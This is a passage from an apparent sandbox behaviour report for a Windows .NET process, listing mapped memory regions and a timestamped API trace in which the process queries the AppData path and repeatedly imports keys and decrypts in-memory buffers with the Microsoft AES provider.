= 0x683f0000 end_va = 0x68b05fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\1f87b5140145c221b5201351fffc52d8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\1f87b5140145c221b5201351fffc52d8\\system.xml.ni.dll") Region: id = 1359 start_va = 0x68340000 end_va = 0x683e4fff monitored = 0 entry_point = 0x6835ac50 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1360 start_va = 0x68310000 end_va = 0x68332fff monitored = 0 entry_point = 0x68315570 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1361 start_va = 0x6c200000 end_va = 0x6c20ffff monitored = 0 entry_point = 0x6c203820 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1362 start_va = 0x9e0000 end_va = 0x9e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 1363 start_va = 0x72100000 end_va = 0x7214efff monitored = 0 entry_point = 0x7210d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1364 start_va = 0x47c0000 end_va = 0x47c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047c0000" filename = "" Region: id = 1365 start_va = 0x4ca0000 end_va = 0x4ca0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ca0000" filename = "" Region: id = 1366 start_va = 0x4cb0000 end_va = 0x4d8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1367 start_va = 0x4d90000 end_va = 0x4dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 1368 start_va = 0x4dd0000 end_va = 0x4ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 1369 start_va = 0x70760000 end_va = 0x707fafff monitored = 0 entry_point = 0x7079f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1370 start_va = 0x70800000 end_va = 0x70811fff monitored = 0 entry_point = 0x70804510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1371 start_va = 0x72040000 end_va = 0x7206efff monitored = 0 entry_point = 0x7204bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1372 start_va = 0x75250000 end_va = 0x75256fff monitored = 0 entry_point = 0x75251e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1373 start_va = 0x71f80000 end_va = 0x71f92fff monitored = 0 entry_point = 0x71f825d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1374 start_va = 0x71f60000 end_va = 0x71f73fff monitored = 0 entry_point = 0x71f63c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1375 start_va = 0x4ed0000 end_va = 0x4ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1376 start_va = 0x4ed0000 end_va = 0x4ed8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1377 start_va = 0x4ed0000 end_va = 0x4ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1378 start_va = 0x4ed0000 end_va = 0x4ed8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1379 start_va = 0x4ed0000 end_va = 0x4ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1380 start_va = 0x4ed0000 end_va = 0x4ed8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1381 start_va = 0x4ed0000 end_va = 0x4f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 1382 start_va = 0x4f10000 end_va = 0x500ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 1383 start_va = 0x5010000 end_va = 0x5020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005010000" filename = "" Region: id = 1384 start_va = 0x72070000 end_va = 0x720f3fff monitored = 0 entry_point = 0x72096530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1385 start_va = 0x70750000 end_va = 0x70757fff monitored = 0 entry_point = 0x70751fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1386 start_va = 0x72030000 end_va = 0x72037fff monitored = 0 entry_point = 0x72031920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1387 start_va = 0x71fe0000 end_va = 0x72026fff monitored = 0 entry_point = 0x71ff58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1388 start_va = 0x68240000 end_va = 0x68302fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Servd1dec626#\\80366b2f53761589c602827eb7cee9f2\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.servd1dec626#\\80366b2f53761589c602827eb7cee9f2\\system.servicemodel.internals.ni.dll") Region: id = 1389 start_va = 0x5030000 end_va = 0x503ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 1390 start_va = 0x5040000 end_va = 0x504ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 1391 start_va = 0x5050000 end_va = 0x505ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 1392 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1393 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1394 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1395 start_va = 0x5030000 end_va = 0x503ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 1396 start_va = 0x70660000 end_va = 0x70687fff monitored = 0 entry_point = 0x70667820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1397 start_va = 0x681c0000 end_va = 0x68230fff monitored = 0 entry_point = 0x682169e0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\SysWOW64\\efswrt.dll" (normalized: "c:\\windows\\syswow64\\efswrt.dll") Region: id = 1398 start_va = 0x741f0000 end_va = 0x742b7fff monitored = 0 entry_point = 0x7425ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 1399 start_va = 0x68170000 end_va = 0x681b8fff monitored = 0 entry_point = 0x68176450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 1400 start_va = 0x5090000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1462 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1484 start_va = 0x7faa0000 end_va = 0x7fe40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1487 start_va = 0x5030000 end_va = 0x503ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 1513 start_va = 0x5030000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 1514 start_va = 0x5190000 end_va = 0x528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Thread: id = 11 os_tid = 0x5c0 [0144.823] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0144.988] RoInitialize () returned 0x1 [0144.988] RoUninitialize () returned 0x0 [0149.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x19ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0149.453] IsAppThemed () returned 0x1 [0149.460] CoTaskMemAlloc (cb=0xf0) returned 0x4d7ed0 [0149.493] CreateActCtxA (pActCtx=0x19f414) returned 0x4d895c [0149.634] CoTaskMemFree (pv=0x4d7ed0) [0149.656] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1dc [0149.656] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1e2 [0149.785] CoTaskMemAlloc (cb=0x20c) returned 0x4f1fc8 [0149.785] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x4f1fc8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0149.791] CoTaskMemFree (pv=0x4f1fc8) [0149.791] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19d7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0152.883] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x4e9b18) returned 1 [0152.891] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.892] CoTaskMemAlloc (cb=0x20) returned 0x4f1e30 [0152.892] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e30, pdwDataLen=0x19f3f0, dwFlags=0x1 | out: pbData=0x4f1e30, pdwDataLen=0x19f3f0) returned 1 [0152.895] CoTaskMemFree (pv=0x4f1e30) [0152.896] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.896] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.896] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.896] CoTaskMemFree (pv=0x4f1e08) [0152.896] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.896] CoTaskMemAlloc (cb=0x20) returned 0x4f1e80 [0152.896] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e80, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e80, pdwDataLen=0x19f3f0) returned 1 [0152.896] CoTaskMemFree (pv=0x4f1e80) [0152.896] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.896] CoTaskMemAlloc (cb=0x20) returned 0x4f1e30 [0152.896] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e30, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e30, pdwDataLen=0x19f3f0) returned 1 [0152.896] CoTaskMemFree (pv=0x4f1e30) [0152.896] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.896] CoTaskMemAlloc (cb=0x20) returned 0x4f1e30 [0152.896] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e30, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e30, pdwDataLen=0x19f3f0) returned 1 [0152.896] CoTaskMemFree (pv=0x4f1e30) [0152.897] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.897] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.897] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.897] CoTaskMemFree (pv=0x4f1e08) [0152.897] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.897] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.897] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.897] CoTaskMemFree (pv=0x4f1e08) [0152.897] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.897] CoTaskMemAlloc (cb=0x20) returned 0x4f1e30 [0152.897] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e30, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e30, pdwDataLen=0x19f3f0) returned 1 [0152.897] CoTaskMemFree (pv=0x4f1e30) [0152.897] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.897] CoTaskMemAlloc (cb=0x20) returned 0x4f1e80 [0152.897] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e80, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e80, pdwDataLen=0x19f3f0) returned 1 [0152.898] CoTaskMemFree (pv=0x4f1e80) [0152.898] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.898] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.898] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.898] CoTaskMemFree (pv=0x4f1e08) [0152.898] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.898] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.898] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.898] CoTaskMemFree (pv=0x4f1e08) [0152.898] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.898] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.899] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.899] CoTaskMemFree (pv=0x4f1e08) [0152.899] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.899] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.899] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.899] CoTaskMemFree (pv=0x4f1e08) [0152.899] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.899] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.899] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.899] CoTaskMemFree (pv=0x4f1e08) [0152.899] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.899] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.899] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.899] CoTaskMemFree (pv=0x4f1e08) [0152.899] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.900] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.900] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.900] CoTaskMemFree (pv=0x4f1e08) [0152.900] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.900] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.900] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.900] CoTaskMemFree (pv=0x4f1e08) [0152.900] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.900] CoTaskMemAlloc (cb=0x20) returned 0x4f1e30 [0152.900] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e30, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e30, pdwDataLen=0x19f3f0) returned 1 [0152.900] CoTaskMemFree (pv=0x4f1e30) [0152.901] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.901] CoTaskMemAlloc (cb=0x20) returned 0x4f1e80 [0152.901] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e80, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e80, pdwDataLen=0x19f3f0) returned 1 [0152.901] CoTaskMemFree (pv=0x4f1e80) [0152.901] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 1 [0152.901] CoTaskMemAlloc (cb=0x20) returned 0x4f1e08 [0152.901] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x4f1e08, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x4f1e08, pdwDataLen=0x19f3f0) returned 1 [0152.902] CoTaskMemFree (pv=0x4f1e08) [0152.902] CryptGetProvParam (in: hProv=0x4e9b18, dwParam=0x1, pbData=0x0, pdwDataLen=0x19f3f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x19f3f0) returned 0 [0152.910] CryptImportKey (in: hProv=0x4e9b18, pbData=0x23019c4, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x4e1640) returned 1 [0152.911] CryptContextAddRef (hProv=0x4e9b18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.935] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x19f41c | out: pfEnabled=0x19f41c) returned 0x0 [0152.944] CryptContextAddRef (hProv=0x4e9b18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.944] CryptDuplicateKey (in: hKey=0x4e1640, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x4e18c0) returned 1 [0152.945] CryptContextAddRef (hProv=0x4e9b18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.945] CryptSetKeyParam (hKey=0x4e18c0, dwParam=0x4, pbData=0x2302394*=0x1, dwFlags=0x0) returned 1 [0152.945] CryptSetKeyParam (hKey=0x4e18c0, dwParam=0x1, pbData=0x2302360, dwFlags=0x0) returned 1 [0152.949] CryptDecrypt (in: hKey=0x4e18c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2302474, pdwDataLen=0x19f42c | out: pbData=0x2302474, pdwDataLen=0x19f42c) returned 1 [0152.950] CryptDecrypt (in: hKey=0x4e18c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23024c0, pdwDataLen=0x19f42c | out: pbData=0x23024c0, pdwDataLen=0x19f42c) returned 0 [0152.951] CryptDestroyKey (hKey=0x4e1640) returned 1 [0152.951] CryptReleaseContext (hProv=0x4e9b18, dwFlags=0x0) returned 1 [0152.951] CryptReleaseContext (hProv=0x4e9b18, dwFlags=0x0) returned 1 [0152.954] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x4ea200) returned 1 [0152.955] CryptImportKey (in: hProv=0x4ea200, pbData=0x2302658, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x4e1640) returned 1 [0152.955] CryptContextAddRef (hProv=0x4ea200, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.956] CryptContextAddRef (hProv=0x4ea200, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.956] CryptDuplicateKey (in: hKey=0x4e1640, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x4e1680) returned 1 [0152.956] CryptContextAddRef (hProv=0x4ea200, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.956] CryptSetKeyParam (hKey=0x4e1680, dwParam=0x4, pbData=0x2302db8*=0x1, dwFlags=0x0) returned 1 [0152.957] CryptSetKeyParam (hKey=0x4e1680, dwParam=0x1, pbData=0x2302d84, dwFlags=0x0) returned 1 [0152.957] CryptDecrypt (in: hKey=0x4e1680, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2302e98, pdwDataLen=0x19f42c | out: pbData=0x2302e98, pdwDataLen=0x19f42c) returned 1 [0152.957] CryptDecrypt (in: hKey=0x4e1680, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2302ee0, pdwDataLen=0x19f42c | out: pbData=0x2302ee0, pdwDataLen=0x19f42c) returned 0 [0152.958] CryptDestroyKey (hKey=0x4e1640) returned 1 [0152.958] CryptReleaseContext (hProv=0x4ea200, dwFlags=0x0) returned 1 [0152.958] CryptReleaseContext (hProv=0x4ea200, dwFlags=0x0) returned 1 [0152.958] CryptAcquireContextW (in: phProv=0x19f42c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f42c*=0x4ea398) returned 1 [0152.960] CryptImportKey (in: hProv=0x4ea398, pbData=0x2303070, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x19f3fc | out: phKey=0x19f3fc*=0x4e1640) returned 1 [0152.961] CryptContextAddRef (hProv=0x4ea398, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.961] CryptContextAddRef (hProv=0x4ea398, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.961] CryptDuplicateKey (in: hKey=0x4e1640, pdwReserved=0x0, dwFlags=0x0, phKey=0x19f3ec | out: phKey=0x19f3ec*=0x4e1900) returned 1 [0152.961] CryptContextAddRef (hProv=0x4ea398, pdwReserved=0x0, dwFlags=0x0) returned 1 [0152.961] CryptSetKeyParam (hKey=0x4e1900, dwParam=0x4, pbData=0x2303830*=0x1, dwFlags=0x0) returned 1 [0152.962] CryptSetKeyParam (hKey=0x4e1900, dwParam=0x1, pbData=0x23037fc, dwFlags=0x0) returned 1 [0152.973] CryptDecrypt (in: hKey=0x4e1900, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2303934, pdwDataLen=0x19f3fc | out: pbData=0x2303934, pdwDataLen=0x19f3fc) returned 1 [0152.973] CryptDecrypt (in: hKey=0x4e1900, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x23039a4, pdwDataLen=0x19f42c | out: pbData=0x23039a4, pdwDataLen=0x19f42c) returned 1 [0152.974] CryptDecrypt (in: hKey=0x4e1900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x23039e8, pdwDataLen=0x19f42c | out: pbData=0x23039e8, pdwDataLen=0x19f42c) returned 0 [0152.974] CryptDestroyKey 